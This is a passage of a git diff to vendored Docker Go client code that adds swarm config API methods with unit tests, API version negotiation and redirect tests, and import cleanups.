+	assert.Check(t, is.Equal(client.version, api.DefaultVersion))
 
 	expected := "1.22"
 	os.Setenv("DOCKER_API_VERSION", expected)
@@ -272,12 +187,135 @@ func TestNewEnvClientSetsDefaultVersion(t *testing.T) {
 	if err != nil {
 		t.Fatal(err)
 	}
-	if client.version != expected {
-		t.Fatalf("Expected %s, got %s", expected, client.version)
+	assert.Check(t, is.Equal(expected, client.version))
+}
+
+// TestNegotiateAPIVersionEmpty asserts that client.Client can
+// negotiate a compatible APIVersion when omitted
+func TestNegotiateAPIVersionEmpty(t *testing.T) {
+	defer env.PatchAll(t, map[string]string{"DOCKER_API_VERSION": ""})()
+
+	client, err := NewEnvClient()
+	assert.NilError(t, err)
+
+	ping := types.Ping{
+		APIVersion:   "",
+		OSType:       "linux",
+		Experimental: false,
+	}
+
+	// set our version to something new
+	client.version = "1.25"
+
+	// if no version from server, expect the earliest
+	// version before APIVersion was implemented
+	expected := "1.24"
+
+	// test downgrade
+	client.NegotiateAPIVersionPing(ping)
+	assert.Check(t, is.Equal(expected, client.version))
+}
+
+// TestNegotiateAPIVersion asserts that client.Client can
+// negotiate a compatible APIVersion with the server
+func TestNegotiateAPIVersion(t *testing.T) {
+	client, err := NewEnvClient()
+	assert.NilError(t, err)
+
+	expected := "1.21"
+	ping := types.Ping{
+		APIVersion:   expected,
+		OSType:       "linux",
+		Experimental: false,
+	}
+
+	// set our version to something new
+	client.version = "1.22"
+
+	// test downgrade
+	client.NegotiateAPIVersionPing(ping)
+	assert.Check(t, is.Equal(expected, client.version))
+
+	// set the client version to something older, and verify that we keep the
+	// original setting.
+	expected = "1.20"
+	client.version = expected
+	client.NegotiateAPIVersionPing(ping)
+	assert.Check(t, is.Equal(expected, client.version))
+
+}
+
+// TestNegotiateAPIVersionOverride asserts that we honor
+// the environment variable DOCKER_API_VERSION when negotiating versions
+func TestNegotiateAPVersionOverride(t *testing.T) {
+	expected := "9.99"
+	defer env.PatchAll(t, map[string]string{"DOCKER_API_VERSION": expected})()
+
+	client, err := NewEnvClient()
+	assert.NilError(t, err)
+
+	ping := types.Ping{
+		APIVersion:   "1.24",
+		OSType:       "linux",
+		Experimental: false,
+	}
+
+	// test that we honored the env var
+	client.NegotiateAPIVersionPing(ping)
+	assert.Check(t, is.Equal(expected, client.version))
+}
+
+type roundTripFunc func(*http.Request) (*http.Response, error)
+
+func (rtf roundTripFunc) RoundTrip(req *http.Request) (*http.Response, error) {
+	return rtf(req)
+}
+
+type bytesBufferClose struct {
+	*bytes.Buffer
+}
+
+func (bbc bytesBufferClose) Close() error {
+	return nil
+}
+
+func TestClientRedirect(t *testing.T) {
+	client := &http.Client{
+		CheckRedirect: CheckRedirect,
+		Transport: roundTripFunc(func(req *http.Request) (*http.Response, error) {
+			if req.URL.String() == "/bla" {
+				return &http.Response{StatusCode: 404}, nil
+			}
+			return &http.Response{
+				StatusCode: 301,
+				Header:     map[string][]string{"Location": {"/bla"}},
+				Body:       bytesBufferClose{bytes.NewBuffer(nil)},
+			}, nil
+		}),
+	}
+
+	cases := []struct {
+		httpMethod  string
+		expectedErr *url.Error
+		statusCode  int
+	}{
+		{http.MethodGet, nil, 301},
+		{http.MethodPost, &url.Error{Op: "Post", URL: "/bla", Err: ErrRedirect}, 301},
+		{http.MethodPut, &url.Error{Op: "Put", URL: "/bla", Err: ErrRedirect}, 301},
+		{http.MethodDelete, &url.Error{Op: "Delete", URL: "/bla", Err: ErrRedirect}, 301},
 	}
 
-	// Restore environment variables
-	for _, key := range envVarKeys {
-		os.Setenv(key, envVarValues[key])
+	for _, tc := range cases {
+		req, err := http.NewRequest(tc.httpMethod, "/redirectme", nil)
+		assert.Check(t, err)
+		resp, err := client.Do(req)
+		assert.Check(t, is.Equal(tc.statusCode, resp.StatusCode))
+		if tc.expectedErr == nil {
+			assert.Check(t, is.Nil(err))
+		} else {
+			urlError, ok := err.(*url.Error)
+			assert.Assert(t, ok, "%T is not *url.Error", err)
+			assert.Check(t, is.Equal(*tc.expectedErr, *urlError))
+		}
 	}
 }
diff --git a/vendor/github.com/docker/docker/client/client_unix.go b/vendor/github.com/docker/docker/client/client_unix.go
index 89de892c85..3d24470ba3 100644
--- a/vendor/github.com/docker/docker/client/client_unix.go
+++ b/vendor/github.com/docker/docker/client/client_unix.go
@@ -1,6 +1,9 @@
-// +build linux freebsd solaris openbsd darwin
+// +build linux freebsd openbsd darwin
 
-package client
+package client // import "github.com/docker/docker/client"
 
 // DefaultDockerHost defines os specific default if DOCKER_HOST is unset
 const DefaultDockerHost = "unix:///var/run/docker.sock"
+
+const defaultProto = "unix"
+const defaultAddr = "/var/run/docker.sock"
diff --git a/vendor/github.com/docker/docker/client/client_windows.go b/vendor/github.com/docker/docker/client/client_windows.go
index 07c0c7a774..c649e54412 100644
--- a/vendor/github.com/docker/docker/client/client_windows.go
+++ b/vendor/github.com/docker/docker/client/client_windows.go
@@ -1,4 +1,7 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 // DefaultDockerHost defines os specific default if DOCKER_HOST is unset
 const DefaultDockerHost = "npipe:////./pipe/docker_engine"
+
+const defaultProto = "npipe"
+const defaultAddr = "//./pipe/docker_engine"
diff --git a/vendor/github.com/docker/docker/client/config_create.go b/vendor/github.com/docker/docker/client/config_create.go
new file mode 100644
index 0000000000..c8b802ad35
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/config_create.go
@@ -0,0 +1,25 @@
+package client // import "github.com/docker/docker/client"
+
+import (
+	"context"
+	"encoding/json"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/swarm"
+)
+
+// ConfigCreate creates a new Config.
+func (cli *Client) ConfigCreate(ctx context.Context, config swarm.ConfigSpec) (types.ConfigCreateResponse, error) {
+	var response types.ConfigCreateResponse
+	if err := cli.NewVersionError("1.30", "config create"); err != nil {
+		return response, err
+	}
+	resp, err := cli.post(ctx, "/configs/create", nil, config, nil)
+	if err != nil {
+		return response, err
+	}
+
+	err = json.NewDecoder(resp.body).Decode(&response)
+	ensureReaderClosed(resp)
+	return response, err
+}
diff --git a/vendor/github.com/docker/docker/client/config_create_test.go b/vendor/github.com/docker/docker/client/config_create_test.go
new file mode 100644
index 0000000000..a6408792db
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/config_create_test.go
@@ -0,0 +1,70 @@
+package client // import "github.com/docker/docker/client"
+
+import (
+	"bytes"
+	"context"
+	"encoding/json"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/swarm"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+)
+
+func TestConfigCreateUnsupported(t *testing.T) {
+	client := &Client{
+		version: "1.29",
+		client:  &http.Client{},
+	}
+	_, err := client.ConfigCreate(context.Background(), swarm.ConfigSpec{})
+	assert.Check(t, is.Error(err, `"config create" requires API version 1.30, but the Docker daemon API version is 1.29`))
+}
+
+func TestConfigCreateError(t *testing.T) {
+	client := &Client{
+		version: "1.30",
+		client:  newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+	_, err := client.ConfigCreate(context.Background(), swarm.ConfigSpec{})
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestConfigCreate(t *testing.T) {
+	expectedURL := "/v1.30/configs/create"
+	client := &Client{
+		version: "1.30",
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			if !strings.HasPrefix(req.URL.Path, expectedURL) {
+				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+			}
+			if req.Method != "POST" {
+				return nil, fmt.Errorf("expected POST method, got %s", req.Method)
+			}
+			b, err := json.Marshal(types.ConfigCreateResponse{
+				ID: "test_config",
+			})
+			if err != nil {
+				return nil, err
+			}
+			return &http.Response{
+				StatusCode: http.StatusCreated,
+				Body:       ioutil.NopCloser(bytes.NewReader(b)),
+			}, nil
+		}),
+	}
+
+	r, err := client.ConfigCreate(context.Background(), swarm.ConfigSpec{})
+	if err != nil {
+		t.Fatal(err)
+	}
+	if r.ID != "test_config" {
+		t.Fatalf("expected `test_config`, got %s", r.ID)
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/config_inspect.go b/vendor/github.com/docker/docker/client/config_inspect.go
new file mode 100644
index 0000000000..4ac566ad89
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/config_inspect.go
@@ -0,0 +1,36 @@
+package client // import "github.com/docker/docker/client"
+
+import (
+	"bytes"
+	"context"
+	"encoding/json"
+	"io/ioutil"
+
+	"github.com/docker/docker/api/types/swarm"
+)
+
+// ConfigInspectWithRaw returns the config information with raw data
+func (cli *Client) ConfigInspectWithRaw(ctx context.Context, id string) (swarm.Config, []byte, error) {
+	if id == "" {
+		return swarm.Config{}, nil, objectNotFoundError{object: "config", id: id}
+	}
+	if err := cli.NewVersionError("1.30", "config inspect"); err != nil {
+		return swarm.Config{}, nil, err
+	}
+	resp, err := cli.get(ctx, "/configs/"+id, nil, nil)
+	if err != nil {
+		return swarm.Config{}, nil, wrapResponseError(err, resp, "config", id)
+	}
+	defer ensureReaderClosed(resp)
+
+	body, err := ioutil.ReadAll(resp.body)
+	if err != nil {
+		return swarm.Config{}, nil, err
+	}
+
+	var config swarm.Config
+	rdr := bytes.NewReader(body)
+	err = json.NewDecoder(rdr).Decode(&config)
+
+	return config, body, err
+}
diff --git a/vendor/github.com/docker/docker/client/config_inspect_test.go b/vendor/github.com/docker/docker/client/config_inspect_test.go
new file mode 100644
index 0000000000..76a5dae9e5
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/config_inspect_test.go
@@ -0,0 +1,103 @@
+package client // import "github.com/docker/docker/client"
+
+import (
+	"bytes"
+	"context"
+	"encoding/json"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/api/types/swarm"
+	"github.com/pkg/errors"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+)
+
+func TestConfigInspectNotFound(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusNotFound, "Server error")),
+	}
+
+	_, _, err := client.ConfigInspectWithRaw(context.Background(), "unknown")
+	if err == nil || !IsErrNotFound(err) {
+		t.Fatalf("expected a NotFoundError error, got %v", err)
+	}
+}
+
+func TestConfigInspectWithEmptyID(t *testing.T) {
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			return nil, errors.New("should not make request")
+		}),
+	}
+	_, _, err := client.ConfigInspectWithRaw(context.Background(), "")
+	if !IsErrNotFound(err) {
+		t.Fatalf("Expected NotFoundError, got %v", err)
+	}
+}
+
+func TestConfigInspectUnsupported(t *testing.T) {
+	client := &Client{
+		version: "1.29",
+		client:  &http.Client{},
+	}
+	_, _, err := client.ConfigInspectWithRaw(context.Background(), "nothing")
+	assert.Check(t, is.Error(err, `"config inspect" requires API version 1.30, but the Docker daemon API version is 1.29`))
+}
+
+func TestConfigInspectError(t *testing.T) {
+	client := &Client{
+		version: "1.30",
+		client:  newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+
+	_, _, err := client.ConfigInspectWithRaw(context.Background(), "nothing")
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestConfigInspectConfigNotFound(t *testing.T) {
+	client := &Client{
+		version: "1.30",
+		client:  newMockClient(errorMock(http.StatusNotFound, "Server error")),
+	}
+
+	_, _, err := client.ConfigInspectWithRaw(context.Background(), "unknown")
+	if err == nil || !IsErrNotFound(err) {
+		t.Fatalf("expected a configNotFoundError error, got %v", err)
+	}
+}
+
+func TestConfigInspect(t *testing.T) {
+	expectedURL := "/v1.30/configs/config_id"
+	client := &Client{
+		version: "1.30",
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			if !strings.HasPrefix(req.URL.Path, expectedURL) {
+				return nil, fmt.Errorf("expected URL '%s', got '%s'", expectedURL, req.URL)
+			}
+			content, err := json.Marshal(swarm.Config{
+				ID: "config_id",
+			})
+			if err != nil {
+				return nil, err
+			}
+			return &http.Response{
+				StatusCode: http.StatusOK,
+				Body:       ioutil.NopCloser(bytes.NewReader(content)),
+			}, nil
+		}),
+	}
+
+	configInspect, _, err := client.ConfigInspectWithRaw(context.Background(), "config_id")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if configInspect.ID != "config_id" {
+		t.Fatalf("expected `config_id`, got %s", configInspect.ID)
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/config_list.go b/vendor/github.com/docker/docker/client/config_list.go
new file mode 100644
index 0000000000..2b9d54606b
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/config_list.go
@@ -0,0 +1,38 @@
+package client // import "github.com/docker/docker/client"
+
+import (
+	"context"
+	"encoding/json"
+	"net/url"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/filters"
+	"github.com/docker/docker/api/types/swarm"
+)
+
+// ConfigList returns the list of configs.
+func (cli *Client) ConfigList(ctx context.Context, options types.ConfigListOptions) ([]swarm.Config, error) {
+	if err := cli.NewVersionError("1.30", "config list"); err != nil {
+		return nil, err
+	}
+	query := url.Values{}
+
+	if options.Filters.Len() > 0 {
+		filterJSON, err := filters.ToJSON(options.Filters)
+		if err != nil {
+			return nil, err
+		}
+
+		query.Set("filters", filterJSON)
+	}
+
+	resp, err := cli.get(ctx, "/configs", query, nil)
+	if err != nil {
+		return nil, err
+	}
+
+	var configs []swarm.Config
+	err = json.NewDecoder(resp.body).Decode(&configs)
+	ensureReaderClosed(resp)
+	return configs, err
+}
diff --git a/vendor/github.com/docker/docker/client/config_list_test.go b/vendor/github.com/docker/docker/client/config_list_test.go
new file mode 100644
index 0000000000..b35a592953
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/config_list_test.go
@@ -0,0 +1,107 @@
+package client // import "github.com/docker/docker/client"
+
+import (
+	"bytes"
+	"context"
+	"encoding/json"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/filters"
+	"github.com/docker/docker/api/types/swarm"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+)
+
+func TestConfigListUnsupported(t *testing.T) {
+	client := &Client{
+		version: "1.29",
+		client:  &http.Client{},
+	}
+	_, err := client.ConfigList(context.Background(), types.ConfigListOptions{})
+	assert.Check(t, is.Error(err, `"config list" requires API version 1.30, but the Docker daemon API version is 1.29`))
+}
+
+func TestConfigListError(t *testing.T) {
+	client := &Client{
+		version: "1.30",
+		client:  newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+
+	_, err := client.ConfigList(context.Background(), types.ConfigListOptions{})
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestConfigList(t *testing.T) {
+	expectedURL := "/v1.30/configs"
+
+	filters := filters.NewArgs()
+	filters.Add("label", "label1")
+	filters.Add("label", "label2")
+
+	listCases := []struct {
+		options             types.ConfigListOptions
+		expectedQueryParams map[string]string
+	}{
+		{
+			options: types.ConfigListOptions{},
+			expectedQueryParams: map[string]string{
+				"filters": "",
+			},
+		},
+		{
+			options: types.ConfigListOptions{
+				Filters: filters,
+			},
+			expectedQueryParams: map[string]string{
+				"filters": `{"label":{"label1":true,"label2":true}}`,
+			},
+		},
+	}
+	for _, listCase := range listCases {
+		client := &Client{
+			version: "1.30",
+			client: newMockClient(func(req *http.Request) (*http.Response, error) {
+				if !strings.HasPrefix(req.URL.Path, expectedURL) {
+					return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+				}
+				query := req.URL.Query()
+				for key, expected := range listCase.expectedQueryParams {
+					actual := query.Get(key)
+					if actual != expected {
+						return nil, fmt.Errorf("%s not set in URL query properly. Expected '%s', got %s", key, expected, actual)
+					}
+				}
+				content, err := json.Marshal([]swarm.Config{
+					{
+						ID: "config_id1",
+					},
+					{
+						ID: "config_id2",
+					},
+				})
+				if err != nil {
+					return nil, err
+				}
+				return &http.Response{
+					StatusCode: http.StatusOK,
+					Body:       ioutil.NopCloser(bytes.NewReader(content)),
+				}, nil
+			}),
+		}
+
+		configs, err := client.ConfigList(context.Background(), listCase.options)
+		if err != nil {
+			t.Fatal(err)
+		}
+		if len(configs) != 2 {
+			t.Fatalf("expected 2 configs, got %v", configs)
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/config_remove.go b/vendor/github.com/docker/docker/client/config_remove.go
new file mode 100644
index 0000000000..a96871e98b
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/config_remove.go
@@ -0,0 +1,13 @@
+package client // import "github.com/docker/docker/client"
+
+import "context"
+
+// ConfigRemove removes a Config.
+func (cli *Client) ConfigRemove(ctx context.Context, id string) error {
+	if err := cli.NewVersionError("1.30", "config remove"); err != nil {
+		return err
+	}
+	resp, err := cli.delete(ctx, "/configs/"+id, nil, nil)
+	ensureReaderClosed(resp)
+	return wrapResponseError(err, resp, "config", id)
+}
diff --git a/vendor/github.com/docker/docker/client/config_remove_test.go b/vendor/github.com/docker/docker/client/config_remove_test.go
new file mode 100644
index 0000000000..9c0c0f9337
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/config_remove_test.go
@@ -0,0 +1,60 @@
+package client // import "github.com/docker/docker/client"
+
+import (
+	"bytes"
+	"context"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+)
+
+func TestConfigRemoveUnsupported(t *testing.T) {
+	client := &Client{
+		version: "1.29",
+		client:  &http.Client{},
+	}
+	err := client.ConfigRemove(context.Background(), "config_id")
+	assert.Check(t, is.Error(err, `"config remove" requires API version 1.30, but the Docker daemon API version is 1.29`))
+}
+
+func TestConfigRemoveError(t *testing.T) {
+	client := &Client{
+		version: "1.30",
+		client:  newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+
+	err := client.ConfigRemove(context.Background(), "config_id")
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestConfigRemove(t *testing.T) {
+	expectedURL := "/v1.30/configs/config_id"
+
+	client := &Client{
+		version: "1.30",
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			if !strings.HasPrefix(req.URL.Path, expectedURL) {
+				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+			}
+			if req.Method != "DELETE" {
+				return nil, fmt.Errorf("expected DELETE method, got %s", req.Method)
+			}
+			return &http.Response{
+				StatusCode: http.StatusOK,
+				Body:       ioutil.NopCloser(bytes.NewReader([]byte("body"))),
+			}, nil
+		}),
+	}
+
+	err := client.ConfigRemove(context.Background(), "config_id")
+	if err != nil {
+		t.Fatal(err)
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/config_update.go b/vendor/github.com/docker/docker/client/config_update.go
new file mode 100644
index 0000000000..39e59cf858
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/config_update.go
@@ -0,0 +1,21 @@
+package client // import "github.com/docker/docker/client"
+
+import (
+	"context"
+	"net/url"
+	"strconv"
+
+	"github.com/docker/docker/api/types/swarm"
+)
+
+// ConfigUpdate attempts to update a Config
+func (cli *Client) ConfigUpdate(ctx context.Context, id string, version swarm.Version, config swarm.ConfigSpec) error {
+	if err := cli.NewVersionError("1.30", "config update"); err != nil {
+		return err
+	}
+	query := url.Values{}
+	query.Set("version", strconv.FormatUint(version.Index, 10))
+	resp, err := cli.post(ctx, "/configs/"+id+"/update", query, config, nil)
+	ensureReaderClosed(resp)
+	return err
+}
diff --git a/vendor/github.com/docker/docker/client/config_update_test.go b/vendor/github.com/docker/docker/client/config_update_test.go
new file mode 100644
index 0000000000..1299f8278c
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/config_update_test.go
@@ -0,0 +1,61 @@
+package client // import "github.com/docker/docker/client"
+
+import (
+	"bytes"
+	"context"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/api/types/swarm"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+)
+
+func TestConfigUpdateUnsupported(t *testing.T) {
+	client := &Client{
+		version: "1.29",
+		client:  &http.Client{},
+	}
+	err := client.ConfigUpdate(context.Background(), "config_id", swarm.Version{}, swarm.ConfigSpec{})
+	assert.Check(t, is.Error(err, `"config update" requires API version 1.30, but the Docker daemon API version is 1.29`))
+}
+
+func TestConfigUpdateError(t *testing.T) {
+	client := &Client{
+		version: "1.30",
+		client:  newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+
+	err := client.ConfigUpdate(context.Background(), "config_id", swarm.Version{}, swarm.ConfigSpec{})
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestConfigUpdate(t *testing.T) {
+	expectedURL := "/v1.30/configs/config_id/update"
+
+	client := &Client{
+		version: "1.30",
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			if !strings.HasPrefix(req.URL.Path, expectedURL) {
+				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+			}
+			if req.Method != "POST" {
+				return nil, fmt.Errorf("expected POST method, got %s", req.Method)
+			}
+			return &http.Response{
+				StatusCode: http.StatusOK,
+				Body:       ioutil.NopCloser(bytes.NewReader([]byte("body"))),
+			}, nil
+		}),
+	}
+
+	err := client.ConfigUpdate(context.Background(), "config_id", swarm.Version{}, swarm.ConfigSpec{})
+	if err != nil {
+		t.Fatal(err)
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/container_attach.go b/vendor/github.com/docker/docker/client/container_attach.go
index eea4682158..88ba1ef639 100644
--- a/vendor/github.com/docker/docker/client/container_attach.go
+++ b/vendor/github.com/docker/docker/client/container_attach.go
@@ -1,16 +1,36 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"context"
 	"net/url"
 
 	"github.com/docker/docker/api/types"
-	"golang.org/x/net/context"
 )
 
 // ContainerAttach attaches a connection to a container in the server.
 // It returns a types.HijackedConnection with the hijacked connection
 // and the a reader to get output. It's up to the called to close
 // the hijacked connection by calling types.HijackedResponse.Close.
+//
+// The stream format on the response will be in one of two formats:
+//
+// If the container is using a TTY, there is only a single stream (stdout), and
+// data is copied directly from the container output stream, no extra
+// multiplexing or headers.
+//
+// If the container is *not* using a TTY, streams for stdout and stderr are
+// multiplexed.
+// The format of the multiplexed stream is as follows:
+//
+//    [8]byte{STREAM_TYPE, 0, 0, 0, SIZE1, SIZE2, SIZE3, SIZE4}[]byte{OUTPUT}
+//
+// STREAM_TYPE can be 1 for stdout and 2 for stderr
+//
+// SIZE1, SIZE2, SIZE3, and SIZE4 are four bytes of uint32 encoded as big endian.
+// This is the size of OUTPUT.
+//
+// You can use github.com/docker/docker/pkg/stdcopy.StdCopy to demultiplex this
+// stream.
 func (cli *Client) ContainerAttach(ctx context.Context, container string, options types.ContainerAttachOptions) (types.HijackedResponse, error) {
 	query := url.Values{}
 	if options.Stream {
diff --git a/vendor/github.com/docker/docker/client/container_commit.go b/vendor/github.com/docker/docker/client/container_commit.go
index c766d62e40..377a2ea681 100644
--- a/vendor/github.com/docker/docker/client/container_commit.go
+++ b/vendor/github.com/docker/docker/client/container_commit.go
@@ -1,31 +1,33 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"context"
 	"encoding/json"
 	"errors"
 	"net/url"
 
-	distreference "github.com/docker/distribution/reference"
+	"github.com/docker/distribution/reference"
 	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/api/types/reference"
-	"golang.org/x/net/context"
 )
 
 // ContainerCommit applies changes into a container and creates a new tagged image.
 func (cli *Client) ContainerCommit(ctx context.Context, container string, options types.ContainerCommitOptions) (types.IDResponse, error) {
 	var repository, tag string
 	if options.Reference != "" {
-		distributionRef, err := distreference.ParseNamed(options.Reference)
+		ref, err := reference.ParseNormalizedNamed(options.Reference)
 		if err != nil {
 			return types.IDResponse{}, err
 		}
 
-		if _, isCanonical := distributionRef.(distreference.Canonical); isCanonical {
+		if _, isCanonical := ref.(reference.Canonical); isCanonical {
 			return types.IDResponse{}, errors.New("refusing to create a tag with a digest reference")
 		}
+		ref = reference.TagNameOnly(ref)
 
-		tag = reference.GetTagFromNamedRef(distributionRef)
-		repository = distributionRef.Name()
+		if tagged, ok := ref.(reference.Tagged); ok {
+			tag = tagged.Tag()
+		}
+		repository = reference.FamiliarName(ref)
 	}
 
 	query := url.Values{}
@@ -37,7 +39,7 @@ func (cli *Client) ContainerCommit(ctx context.Context, container string, option
 	for _, change := range options.Changes {
 		query.Add("changes", change)
 	}
-	if options.Pause != true {
+	if !options.Pause {
 		query.Set("pause", "0")
 	}
 
diff --git a/vendor/github.com/docker/docker/client/container_commit_test.go b/vendor/github.com/docker/docker/client/container_commit_test.go
index a844675368..8e3fe8b730 100644
--- a/vendor/github.com/docker/docker/client/container_commit_test.go
+++ b/vendor/github.com/docker/docker/client/container_commit_test.go
@@ -1,7 +1,8 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"encoding/json"
 	"fmt"
 	"io/ioutil"
@@ -10,7 +11,6 @@ import (
 	"testing"
 
 	"github.com/docker/docker/api/types"
-	"golang.org/x/net/context"
 )
 
 func TestContainerCommitError(t *testing.T) {
@@ -91,6 +91,6 @@ func TestContainerCommit(t *testing.T) {
 		t.Fatal(err)
 	}
 	if r.ID != "new_container_id" {
-		t.Fatalf("expected `container_id`, got %s", r.ID)
+		t.Fatalf("expected `new_container_id`, got %s", r.ID)
 	}
 }
diff --git a/vendor/github.com/docker/docker/client/container_copy.go b/vendor/github.com/docker/docker/client/container_copy.go
index 8380eeabc9..d706260cee 100644
--- a/vendor/github.com/docker/docker/client/container_copy.go
+++ b/vendor/github.com/docker/docker/client/container_copy.go
@@ -1,6 +1,7 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"context"
 	"encoding/base64"
 	"encoding/json"
 	"fmt"
@@ -10,8 +11,6 @@ import (
 	"path/filepath"
 	"strings"
 
-	"golang.org/x/net/context"
-
 	"github.com/docker/docker/api/types"
 )
 
@@ -20,29 +19,34 @@ func (cli *Client) ContainerStatPath(ctx context.Context, containerID, path stri
 	query := url.Values{}
 	query.Set("path", filepath.ToSlash(path)) // Normalize the paths used in the API.
 
-	urlStr := fmt.Sprintf("/containers/%s/archive", containerID)
+	urlStr := "/containers/" + containerID + "/archive"
 	response, err := cli.head(ctx, urlStr, query, nil)
 	if err != nil {
-		return types.ContainerPathStat{}, err
+		return types.ContainerPathStat{}, wrapResponseError(err, response, "container:path", containerID+":"+path)
 	}
 	defer ensureReaderClosed(response)
 	return getContainerPathStatFromHeader(response.header)
 }
 
 // CopyToContainer copies content into the container filesystem.
-func (cli *Client) CopyToContainer(ctx context.Context, container, path string, content io.Reader, options types.CopyToContainerOptions) error {
+// Note that `content` must be a Reader for a TAR archive
+func (cli *Client) CopyToContainer(ctx context.Context, containerID, dstPath string, content io.Reader, options types.CopyToContainerOptions) error {
 	query := url.Values{}
-	query.Set("path", filepath.ToSlash(path)) // Normalize the paths used in the API.
+	query.Set("path", filepath.ToSlash(dstPath)) // Normalize the paths used in the API.
 	// Do not allow for an existing directory to be overwritten by a non-directory and vice versa.
 	if !options.AllowOverwriteDirWithFile {
 		query.Set("noOverwriteDirNonDir", "true")
 	}
 
-	apiPath := fmt.Sprintf("/containers/%s/archive", container)
+	if options.CopyUIDGID {
+		query.Set("copyUIDGID", "true")
+	}
+
+	apiPath := "/containers/" + containerID + "/archive"
 
 	response, err := cli.putRaw(ctx, apiPath, query, content, nil)
 	if err != nil {
-		return err
+		return wrapResponseError(err, response, "container:path", containerID+":"+dstPath)
 	}
 	defer ensureReaderClosed(response)
 
@@ -54,15 +58,15 @@ func (cli *Client) CopyToContainer(ctx context.Context, container, path string,
 }
 
 // CopyFromContainer gets the content from the container and returns it as a Reader
-// to manipulate it in the host. It's up to the caller to close the reader.
-func (cli *Client) CopyFromContainer(ctx context.Context, container, srcPath string) (io.ReadCloser, types.ContainerPathStat, error) {
+// for a TAR archive to manipulate it in the host. It's up to the caller to close the reader.
+func (cli *Client) CopyFromContainer(ctx context.Context, containerID, srcPath string) (io.ReadCloser, types.ContainerPathStat, error) {
 	query := make(url.Values, 1)
 	query.Set("path", filepath.ToSlash(srcPath)) // Normalize the paths used in the API.
 
-	apiPath := fmt.Sprintf("/containers/%s/archive", container)
+	apiPath := "/containers/" + containerID + "/archive"
 	response, err := cli.get(ctx, apiPath, query, nil)
 	if err != nil {
-		return nil, types.ContainerPathStat{}, err
+		return nil, types.ContainerPathStat{}, wrapResponseError(err, response, "container:path", containerID+":"+srcPath)
 	}
 
 	if response.statusCode != http.StatusOK {
diff --git a/vendor/github.com/docker/docker/client/container_copy_test.go b/vendor/github.com/docker/docker/client/container_copy_test.go
index 706a20c818..efddbef20d 100644
--- a/vendor/github.com/docker/docker/client/container_copy_test.go
+++ b/vendor/github.com/docker/docker/client/container_copy_test.go
@@ -1,7 +1,8 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"encoding/base64"
 	"encoding/json"
 	"fmt"
@@ -10,8 +11,6 @@ import (
 	"strings"
 	"testing"
 
-	"golang.org/x/net/context"
-
 	"github.com/docker/docker/api/types"
 )
 
